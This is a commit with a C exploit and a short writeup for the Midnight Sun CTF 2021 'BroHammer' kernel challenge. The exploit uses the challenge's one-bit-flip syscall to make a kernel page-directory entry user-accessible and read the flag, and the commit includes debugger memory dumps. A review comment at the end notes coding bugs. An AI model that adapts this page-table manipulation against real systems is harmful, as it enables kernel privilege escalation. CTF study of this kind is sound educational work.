Commit 54e4572

Solved BroHammer from Midnightsun CTF 2021
Mini writeup below the exploit
1 parent fe817ea commit 54e4572

1 file changed

+143
-0
lines changed


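--- a/midnightsun2021_brohammer_exploit.c
+++ b/midnightsun2021_brohammer_exploit.c
@@ -0,0 +1,143 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#ifndef __NR_BROHAMMER
+#define __NR_BROHAMMER 333
+#endif
+
+void brohammer(unsigned long addr, int bit){
+return syscall(__NR_BROHAMMER, addr, bit);
+}
+
+int main(){
+brohammer(0xffff8800018fb138, 2);
+unsigned char* flag = (unsigned char*)0xffff880004e19000ULL;
+for (unsigned char *j = flag; j < flag + 0x100 && *j; ++j) {
+printf("%c", *j);
+}
+}
+
+
+/*
+#!/bin/bash
+qemu-system-x86_64 \
+-m 128M \
+-kernel ./kernel \
+-initrd ./initrd \
+-nographic \
+-monitor /dev/null \
+-append "nokaslr root=/dev/ram rw console=ttyS0 oops=panic paneic=1 quiet" 2>/dev/null
+
+NO KASLR, SMEP, SMAP, KPTI
+*/
+
+/*
+#include <linux/kernel.h>
+#include <linux/init.h>
+#include <linux/sched.h>
+#include <linux/syscalls.h>
+
+#ifndef __NR_BROHAMMER
+#define __NR_BROHAMMER 333
+#endif
+
+unsigned long flips = 0;
+
+SYSCALL_DEFINE2(brohammer, long *, addr, long, bit) // define a new syscall with number 333 that flip a specified bit on a specified address
+{
+if (flips >= 1)
+{
+printk(KERN_INFO "brohammer: nope\n");
+return -EPERM;
+}
+
+*addr ^= (1ULL << (bit));
+(*(long *) &flips)++;
+
+return 0;
+}
+*/
+
+
+/*
+0xffff880000000000-0xffff880000099000 0x0000000000000000-0x0000000000099000 0x99000 0x1000 153 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffff880000099000-0xffff88000009a000 0x0000000000099000-0x000000000009a000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xffff88000009a000-0xffff88000009b000 0x000000000009a000-0x000000000009b000 0x1000 0x1000 1 [R-X KERN ACCESSED DIRTY GLOBAL]
+0xffff88000009b000-0xffff880000200000 0x000000000009b000-0x0000000000200000 0x165000 0x1000 357 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffff880000200000-0xffff880001000000 0x0000000000200000-0x0000000001000000 0xe00000 0x200000 7 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffff880001000000-0xffff880001400000 0x0000000001000000-0x0000000001400000 0x400000 0x200000 2 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xffff880001400000-0xffff880001404000 0x0000000001400000-0x0000000001404000 0x4000 0x1000 4 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xffff880001404000-0xffff880001600000 0x0000000001404000-0x0000000001600000 0x1fc000 0x1000 508 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffff880001600000-0xffff880001671000 0x0000000001600000-0x0000000001671000 0x71000 0x1000 113 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xffff880001671000-0xffff880001800000 0x0000000001671000-0x0000000001800000 0x18f000 0x1000 399 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffff880001800000-0xffff880007e00000 0x0000000001800000-0x0000000007e00000 0x6600000 0x200000 51 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffff880007e00000-0xffff880007fe0000 0x0000000007e00000-0x0000000007fe0000 0x1e0000 0x1000 480 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000000000-0xffffc90000004000 0x0000000000086000-0x000000000008a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000008000-0xffffc9000000c000 0x0000000000010000-0x0000000000014000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000010000-0xffffc90000014000 0x0000000000016000-0x000000000001a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000018000-0xffffc9000001c000 0x000000000001c000-0x0000000000020000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000020000-0xffffc90000024000 0x0000000000023000-0x0000000000027000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000028000-0xffffc9000002c000 0x000000000002a000-0x000000000002e000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000030000-0xffffc90000034000 0x0000000000030000-0x0000000000034000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000038000-0xffffc9000003c000 0x0000000000036000-0x000000000003a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000040000-0xffffc90000044000 0x0000000000058000-0x000000000005c000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000048000-0xffffc9000004c000 0x000000000005d000-0x0000000000061000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000050000-0xffffc90000054000 0x000000000019b000-0x000000000019f000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000058000-0xffffc9000005c000 0x000000000358d000-0x0000000003591000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000060000-0xffffc90000064000 0x00000000035cb000-0x00000000035cf000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000065000-0xffffc90000068000 0x00000000023c8000-0x00000000023cb000 0x3000 0x1000 3 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc9000006c000-0xffffc90000070000 0x00000000023db000-0x00000000023df000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000074000-0xffffc90000075000 0x00000000023ec000-0x00000000023ed000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000075000-0xffffc90000076000 0x000000000772b000-0x000000000772c000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000076000-0xffffc90000077000 0x000000000772e000-0x000000000772f000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffc90000077000-0xffffc90000078000 0x0000000007718000-0x0000000007719000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffea0000000000-0xffffea0000200000 0x0000000006000000-0x0000000006200000 0x200000 0x200000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xfffffe0000000000-0xfffffe0000001000 0x00000000018c3000-0x00000000018c4000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xfffffe0000001000-0xfffffe0000002000 0x0000000001809000-0x000000000180a000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xfffffe0000002000-0xfffffe0000003000 0x000000000180f000-0x0000000001810000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xfffffe0000003000-0xfffffe0000006000 0x0000000001806000-0x0000000001809000 0x3000 0x1000 3 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xfffffe0000006000-0xfffffe0000007000 0x0000000001401000-0x0000000001402000 0x1000 0x1000 1 [R-X KERN ACCESSED DIRTY GLOBAL]
+0xfffffe0000007000-0xfffffe000000c000 0x000000000180a000-0x000000000180f000 0x5000 0x1000 5 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffffff81000000-0xffffffff81400000 0x0000000001000000-0x0000000001400000 0x400000 0x200000 2 [R-X KERN ACCESSED DIRTY GLOBAL]
+0xffffffff81400000-0xffffffff81404000 0x0000000001400000-0x0000000001404000 0x4000 0x1000 4 [R-X KERN ACCESSED DIRTY GLOBAL]
+0xffffffff81404000-0xffffffff81600000 0x0000000001404000-0x0000000001600000 0x1fc000 0x1000 508 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffffff81600000-0xffffffff81800000 0x0000000001600000-0x0000000001800000 0x200000 0x200000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
+0xffffffff81800000-0xffffffff81a00000 0x0000000001800000-0x0000000001a00000 0x200000 0x1000 512 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffffffff5fc000-0xffffffffff5fd000 0x00000000fec00000-0x00000000fec01000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffffffff5fd000-0xffffffffff5fe000 0x00000000fee00000-0x00000000fee01000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
+0xffffffffff600000-0xffffffffff601000 0x0000000001804000-0x0000000001805000 0x1000 0x1000 1 [R-- USER ACCESSED DIRTY GLOBAL]
+
+gef> search-pattern "this is where the flag will be on the remote host"
+[+] Searching 'this is where the flag will be on the remote host' in whole memory
+[+] In (0xffff880001800000-0xffff880007e00000 [rw-])
+0xffff880004e19000: 74 68 69 73 20 69 73 20 77 68 65 72 65 20 74 68 | this is where th |
+[+] Searching 't\x00h\x00i\x00s\x00 \x00i\x00s\x00 \x00w\x00h\x00e\x00r\x00e\x00 \x00t\x00h\x00e\x00 \x00f\x00l\x00a\x00g\x00 \x00w\x00i\x00l\x00l\x00 \x00b\x00e\x00 \x00o\x00n\x00 \x00t\x00h\x00e\x00 \x00r\x00e\x00m\x00o\x00t\x00e\x00 \x00h\x00o\x00s\x00t\x00' in whole memory
+gef> x/s 0xffff880004e19000
+0xffff880004e19000: "this is where the flag will be on the remote host...\n"
+gef> xinfo 0xffff880004e19000
+---------------------------------------------------------------------------------------- xinfo: 0xffff880004e19000 ----------------------------------------------------------------------------------------
+Virtual address start-end Physical address start-end Total size Page size Count Flags
+0xffff880001800000-0xffff880007e00000 0x0000000001800000-0x0000000007e00000 0x6600000 0x200000 51 [RW- KERN ACCESSED DIRTY GLOBAL]
+Offset (from virt mapped): 0xffff880001800000 + 0x3619000
+Offset (from phys mapped): 0x1800000 + 0x3619000
+
+Physical address : 0x4e19000
+Physical map pages size : 2 MiB
+
+0x4e19000 % 2**21 => 0x1900 => Address of 2MiB aligned page starts at 0x4e00000
+
+Thanks to 'xinfo' I started checking the physical address start until I find 0x4e00000 using the command 'xp'
+xp -- Dump physical memory via qemu-monitor. (gef)
+
+After manually inspecting all address from 0x1800000 I reached:
+gef> xp 0x18fb138
+00000000018fb138: 0x8000000004e001e3
+
+So we need to flip 0xffff8800018fb138, but which bit??? StackOverflow gave me an answer:
+https://stackoverflow.com/questions/59948388/how-to-properly-set-privileges-in-page-directory-entries
+
+So if we flip the 2° bit we can read the content of those mapping also from userland...
+*/
+
+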
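Review bot: `brohammer` at file line 9 is declared `void` yet returns the `syscall()` result, which is a constraint violation in C11 (a `return` with an expression in a void function) and also throws away the only signal that the kernel refused the flip — the commented handler answers `-EPERM` after the first call — so `main` dereferences `flag` regardless of whether the call succeeded. Declare it `long brohammer(unsigned long addr, int bit){` and guard the read with `if (brohammer(0xffff8800018fb138, 2) < 0) { perror("brohammer"); return 1; }`. The qemu command in the first comment block also spells `paneic=1`, which the kernel will drop as an unknown parameter, so the intended `panic=1` never takes effect; worth a note in the writeup so the documented boot line matches what was actually run.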
